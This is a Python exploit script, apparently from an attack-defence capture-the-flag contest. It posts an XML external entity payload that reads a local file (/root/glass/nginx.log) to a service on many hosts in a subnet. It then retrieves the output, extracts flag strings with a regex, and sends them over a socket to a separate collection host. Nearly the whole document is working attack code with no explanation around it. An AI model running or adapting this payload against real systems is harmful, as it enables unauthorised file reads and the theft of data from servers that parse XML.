import requests from multiprocessing dummy import Pool Process import

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
import requests
from multiprocessing.dummy import Pool, Process
import socket
import re
import time
PORT = '8001'
NAME = 'erfm-37c7-b7j8'
#NAME = '22'
LIST = []
address = ('10.10.10.2', 31337)
pattern = '[A-Z0-9]{31}='
rgx = re.compile(pattern)
post = '''<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE picture [<!ENTITY z SYSTEM "file:///root/glass/nginx.log">]>
<picture>
<name>9916-3235-9674</name>
<description>Picture description</description>
<data>&z;</data>
</picture>'''
urls = ['10.60.{0}.8'.format(i) for i in range(1, 322) if i != 27]
def posting():
global LIST
while True:
if LIST:
s = '\n'.join(LIST)
s += '\n'
s = bytes(s, encoding='ascii')
ms = socket.socket()
ms.connect(address)
try:
ms.send(s)
except:
pass
print(ms.recv(1024))
ms.close()
LIST = []
time.sleep(5)
def get(url):
url = 'http://' + url + ':' + PORT
sess = requests.session()
data = { 'name': NAME,
'text': post }
try:
response_post = sess.post(url, data=data)
response_get = sess.get(url + '/get?name=' + NAME)
except Exception:
return
ret = response_get.text
if len(ret) > 300:
print(url)
print(response_get.text)
print('-'*80)
flags = rgx.findall(ret)
if flags:
s = '\n'.join(flags)
LIST.append(s)
else:
print(url + ' LOCKED')
return ''
pool = Pool()
sender = Process(target=posting)
sender.start()
lst = pool.map(get, urls)
pool.close()
pool.join()
exit()